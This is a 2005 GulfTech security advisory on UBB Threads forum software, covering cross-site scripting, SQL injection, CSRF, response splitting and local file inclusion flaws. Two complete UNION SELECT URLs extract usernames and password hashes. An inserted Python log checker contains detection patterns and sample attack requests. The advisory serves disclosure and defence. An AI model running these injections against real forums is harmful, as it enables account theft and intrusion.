Infopop UBB Threads Multiple Vulnerabilities

From: GulfTech Security Research (security_at_gulftech.org)
Date: 06/24/05

    Date: Thu, 23 Jun 2005 23:26:51 -0500
    To: BugTraq <bugtraq@securityfocus.com>, Secunia Research <vuln@secunia.com>, OSVDB <moderators@osvdb.org>
    ##########################################################
    # GulfTech Security Research June 23rd, 2005
    ##########################################################
    # Vendor : Infopop Corporation
    # URL : http://www.ubbcentral.com/ubbthreads/
    # Version : All Versions Prior To 6.5.2 Beta
    # Risk : Multiple Vulnerabilities
    ##########################################################

    Description:
    UBB Threads is a very popular forum system developed by Infopop.
    There are a number of vulnerabilities in UBB Threads that may allow
    an attacker to carry out cross site scripting, HTTP response splitting,
    and cross site request forgery attacks. Also, an attacker may include,
    execute, or read arbitrary local files. These vulnerabilities may allow
    an attacker to completely compromise an installation of UBB Threads,
    and possibly more. Users are encouraged to upgrade as soon as possible
    to the latest UBB Threads release.

    Cross Site Scripting:
    There are a large number of cross site scripting issues in UBB Threads.
    Because there are so many, the examples below simply put [XSS] where an
    attacker might place offending code. Some examples look like this:

    http://ubbt/dosearch.php?Cat=0&Searchpage=2[XSS]&topic=
    http://ubbt/newreply.php?Cat=0&Board=UBB8&Number=39818[XSS]&page=0&what=showflat&fpart=1&vc=1
    http://ubbt/newreply.php?Cat=0&Board=UBB8&Number=39818&page=0&what=showflat[XSS]&fpart=1&vc=1
    http://ubbt/newreply.php?Cat=0&Board=UBB8&Number=39818&page=0[XSS]&what=showflat&fpart=1&vc=1
    http://ubbt/showprofile.php?Cat=0&User=7&Number=39818[XSS]&Board=UBB8&what=showflat&page=0&fpart=1&vc=1
    http://ubbt/showprofile.php?Cat=0&User=7&Number=39818&Board=UBB8[XSS]&what=showflat&page=0&fpart=1&vc=1
    http://ubbt/showprofile.php?Cat=0&User=7&Number=39818&Board=UBB8&what=showflat[XSS]&page=0&fpart=1&vc=1
    http://ubbt/showflat.php?Cat=0&Board=UBB5&Number=42173&page=0&fpart=all[XSS]
    http://ubbt/showflat.php?Cat=0&Board=UBB5&Number=42173&page=0[XSS]&fpart=all
    http://ubbt/showmembers.php?Cat=&like=p[XSS]&sb=1&page=1

    These vulnerabilities can be used to steal sensitive information from a
    user, and possibly lead to malicious code execution in the context of
    the victim's browser.

    SQL Injection:
    There are a number of SQL Injection issues in UBB Threads that allow
    an attacker to alter or disclose sensitive information in the underlying
    database. Below are some examples:

    http://ubbt/download.php?Number=42227[SQL]
    http://ubbt/calendar.php?Cat=7&month=6&year=2005[SQL]
    http://ubbt/calendar.php?Cat=&month=7[SQL]&year=2005
    http://ubbt/modifypost.php?Cat=0&Username=foobar&Number=[SQL]&Board=UBB8&page=0&what=showflat&fpart=&vc=1&Approved=yes&convert=markup&Subject=Re%3A+Pruning+old+posts&Icon=book.gif&Body=yup&markedit=1&addsig=1&preview=1&peditdelete=Delete+this+post

    The above are just examples, and will not do anything except maybe
    trigger an error, but I will provide a few examples of how these
    vulnerabilities could be exploited. First, there is an SQL Injection
    issue that occurs when emailing a thread to someone:

    http://ubbt/mailthread.php?Cat=0&Board=UBB2&Number=-99'%20UNION%20SELECT%20U_Username,U_Password%20FROM%20w3t_Users%20WHERE%20U_Username%20=%20'victim'/*&page=0&vc=1&fpart=1&what=showflat

    Visiting a URL like the one above by itself will not cause much to
    happen, but if you complete the form, you will notice that an email
    arrives at the address you specified in the form, and the contents of
    that email are the contents you queried from the database! Also, in
    the private messaging feature there is another serious SQL Injection
    issue:

    http://ubbt/viewmessage.php?Cat=&message=-99%20UNION%20SELECT%20null,U_Username,U_Password,0,0%20FROM%20w3t_Users%20WHERE%20U_Username%20=%20'foobar'/*&status=N&box=received

    A URL like the one above would yield the username and password hash of
    the user 'foobar'.

    http://ubbt/addfav.php?Cat=0&Board=UBB2&main=41654[SQL]&type=reminder&Number=41654&page=0&vc=1&fpart=1&what=showflat
    http://ubbt/notifymod.php?Cat=0&Board=UBB5&Number=42173[SQL]&page=0&what=showthreaded
    http://ubbt/grabnext.php?Cat=4&Board=UBB23&mode=showflat&sticky=0&dir=old&posted=1045942715[SQL]

    Also, there are a few SQL Injection issues that require the POST method.
    For example, when rating a profile, a post, or anything else (they all
    use the same feature) you can supply arbitrary SQL statements in the
    "Main" parameter. Also, when conducting a search an attacker may supply
    arbitrary SQL statements in the "Forum[]" array and have them execute
    successfully with the privileges of the current MySQL user.

    Cross Site Request Forgery:
    There are a number of CSRF issues in UBB Threads, and these issues allow
    an attacker to make a victim unwittingly change their ignore and address
    settings.

    http://ubbt/addaddress.php?Cat=0&User=123&Board=&Number=&what=showmembers&page=1
    http://ubbt/toggleignore.php?Cat=0&User=123&Board=&Number=&what=showmembers&page=1
    http://ubbt/removeignore.php?Cat=&User=123
    http://ubbt/removeaddress.php?Cat=&User=123

    These issues really affect privacy on the forums, and make it nearly
    impossible to keep away from any harassing members :)

    HTTP Response Splitting:
    There are several HTTP Response Splitting issues in UBB Threads. These
    issues allow an attacker to manipulate the headers sent back to the
    user, and may allow code execution in the context of the victim's
    browser. The "Cat" parameter is vulnerable in all of the files
    toggleshow.php, togglecats.php, and showprofile.php.

    Local File Inclusion:
    UBB Threads suffers from a local file inclusion vulnerability when
    handling language preferences extracted from the cookie. The "language"
    parameter is never sanitized and can thus be exploited by specifying an
    arbitrary file location appended with a null byte (%00). This could
    lead to code execution, or in most cases, file disclosure.
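    As an added example (not from the advisory, and not UBB Threads code), the following Python checker flags requests of the kinds described in the SQL injection, response splitting and local file inclusion sections above; because it also flags non-integer values in the numeric parameters the advisory lists, it catches the [XSS]/[SQL] tails from the earlier sections too. The log format is assumed: a combined-style access log line with the Cookie header appended as a trailing quoted field, and the sample lines are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Parameters the advisory shows taking [XSS]/[SQL] payloads; UBB Threads
# treats them as integers, so any other non-empty value deserves a look.
NUMERIC_PARAMS = {"Number", "Cat", "page", "User", "month", "year", "main",
                  "posted", "Searchpage", "message"}
INT_RE = re.compile(r"^-?\d+$")
UNION_RE = re.compile(r"union\s+select", re.I)
# Assumed log format: combined-style line followed by the Cookie header in quotes.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" '
                    r'\d+ \S+ "([^"]*)"$')

def check_request(target, cookie=""):
    """Return (kind, parameter) findings for one request target and Cookie header."""
    findings = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if name in NUMERIC_PARAMS and value and not INT_RE.match(value):
            findings.append(("non-numeric value", name))      # [XSS]/[SQL] tails
        if UNION_RE.search(value):
            findings.append(("sql injection", name))
        if name == "Cat" and ("\r" in value or "\n" in value):
            findings.append(("response splitting", name))     # CRLF in Cat
    for part in cookie.split(";"):                             # language cookie LFI
        key, _, val = part.strip().partition("=")
        if key == "language" and ("\x00" in unquote(val) or "../" in unquote(val)):
            findings.append(("local file inclusion", "Cookie:language"))
    return findings

def scan_log(lines):
    """Return [(client, path, findings)] for every parseable line with a finding."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            client, target, cookie = m.groups()
            found = check_request(target, cookie)
            if found:
                hits.append((client, urlsplit(target).path, found))
    return hits

SAMPLE_LOG = [  # constructed sample lines, not real traffic
    '10.0.0.5 - - [23/Jun/2005:10:00:00 -0500] "GET /showflat.php?Cat=0&Board=UBB5&Number=42173&page=0&fpart=all HTTP/1.1" 200 812 "language=english"',
    '10.0.0.9 - - [23/Jun/2005:10:00:07 -0500] "GET /viewmessage.php?Cat=&message=-99%20UNION%20SELECT%20null,U_Username,U_Password,0,0%20FROM%20w3t_Users HTTP/1.1" 200 640 "language=english"',
    '10.0.0.9 - - [23/Jun/2005:10:00:12 -0500] "GET /togglecats.php?Cat=0%0d%0aX-Injected:%201 HTTP/1.1" 302 0 "language=english"',
    '10.0.0.9 - - [23/Jun/2005:10:00:20 -0500] "GET /index.php HTTP/1.1" 200 3200 "language=../../../../some/file%00"',
]
```

    Calling scan_log(SAMPLE_LOG) reports the three suspicious lines and leaves the ordinary showflat.php request alone; the POST-only "Main" and "Forum[]" cases need request bodies, which this log format does not carry.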

    Solution:
    An updated version of UBB Threads has been released to address the
    previously mentioned issues, and users are strongly advised to upgrade
    immediately.

    http://www.ubbcentral.com/boards/showflat.php/Cat/0/Number/42351/Main/42351/#Post42351

    Users can visit the above URL to get information regarding UBB Threads
    security updates.

    Related Info:
    The original advisory can be found at the following location:
    http://www.gulftech.org/?node=research&article_id=00084-06232005

    Credits:
    James Bercegay of the GulfTech Security Research Team
